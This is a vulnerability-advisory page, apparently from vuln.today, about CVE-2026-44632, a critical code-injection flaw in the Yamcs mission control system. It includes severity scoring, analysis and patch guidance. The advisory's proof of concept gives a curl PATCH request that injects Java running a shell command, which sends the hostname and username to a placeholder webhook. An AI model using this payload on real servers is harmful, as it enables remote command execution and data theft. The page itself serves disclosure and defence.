Skip to main content

Yamcs CVE-2026-44632

CRITICAL
Code Injection (CWE-94)
2026-05-27 https://github.com/yamcs/yamcs GHSA-524g-x36v-9wm6
9.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
May 27, 2026 - 00:28 vuln.today
Analysis Generated
May 27, 2026 - 00:28 vuln.today
CVE Published
May 27, 2026 - 00:05 nvd
CRITICAL 9.1

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 6 maven packages depend on org.yamcs:yamcs-core (6 direct, 0 indirect)

Ecosystem-wide dependent count for version 5.12.7.

DescriptionGitHub Advisory

Summary

A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.

Proof of Concept (PoC)

The vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.

Prerequisites:

  1. A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime).
  2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.

Steps to Reproduce:

  1. Send an authenticated HTTP PATCH request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., copySunsensor). The payload uses java.lang.Runtime to execute a reverse shell or ping an external webhook.
bash
curl -i -X PATCH \
  'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
  -d '{
    "action": "SET",
    "algorithm": {
      "text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"
    }
  }'
  1. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to generate sun sensor data).
  2. The Yamcs server uses the Janino SimpleCompiler to compile the injected text into a Java class on the fly. Since no restrictive ClassLoader is applied, the payload is successfully compiled and executed.
  3. Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.

Impact

This vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.

Credits

Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.

AnalysisAI

Remote code execution in Yamcs (Yet Another Mission Control System) versions before 5.12.7 allows an authenticated user holding the ChangeMissionDatabase privilege to run arbitrary OS commands on the server host. The flaw lives in the JavaExprAlgorithmExecutionFactory, which dynamically compiles user-supplied algorithm text with the Janino compiler without any sandbox or restrictive ClassLoader, so injected Java (e.g. java.lang.Runtime.exec) executes with the privileges of the Yamcs process. A detailed proof-of-concept exploit using a REST PATCH to override an existing algorithm is publicly available in the vendor advisory; the issue is not listed in CISA KEV.

Technical ContextAI

Yamcs is an open-source mission control framework (yamcs-core, distributed as the Maven artifact org.yamcs:yamcs-core) used to operate spacecraft and other remote assets. It supports user-defined algorithms in its Mission Database (MDB) that transform and derive telemetry/command parameters. For Java-expression algorithms, the org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory feeds the algorithm's text into Janino's SimpleCompiler, which compiles the snippet into a real JVM class at runtime. This is a textbook CWE-94 (Improper Control of Generation of Code / 'Code Injection') root cause: because the compiled text is treated as trusted source code rather than data, and no security manager, allowlist, or restricted ClassLoader constrains what the snippet may reference, the snippet can call arbitrary Java APIs including Runtime.getRuntime().exec() to spawn OS processes.

RemediationAI

Vendor-released patch: 5.12.7 - upgrade the org.yamcs:yamcs-core dependency (and the deployed Yamcs server) to 5.12.7 or later as the primary fix, per the advisory at https://github.com/yamcs/yamcs/security/advisories/GHSA-524g-x36v-9wm6. Until the upgrade is applied, reduce exposure by tightly restricting who holds the SystemPrivilege.ChangeMissionDatabase privilege (treat it as equivalent to host shell access) and auditing the current role assignments, since any holder can execute code; the trade-off is that legitimate operators lose the ability to edit Mission Database algorithms. Additionally, restrict network access to the Yamcs REST API (notably the /api/mdb/.../algorithms override endpoints on the management port, commonly 8090) to trusted administrative networks, and monitor for unexpected child processes spawned by the Yamcs JVM or anomalous outbound connections that would indicate algorithm-based command execution; note that network restrictions do not stop an already-privileged insider, so privilege reduction remains the more effective interim control.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2012-1723 CRITICAL POC
9.8 Jun 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up

CVE-2013-0422 CRITICAL POC
9.8 Jan 10

Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using

CVE-2012-0507 CRITICAL POC
9.8 Jun 07

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up

CVE-2015-4852 CRITICAL POC
9.8 Nov 18

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers

CVE-2012-5076 CRITICAL POC
9.8 Oct 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2012-0391 CRITICAL POC
9.8 Jan 08

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during

Share

CVE-2026-44632 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy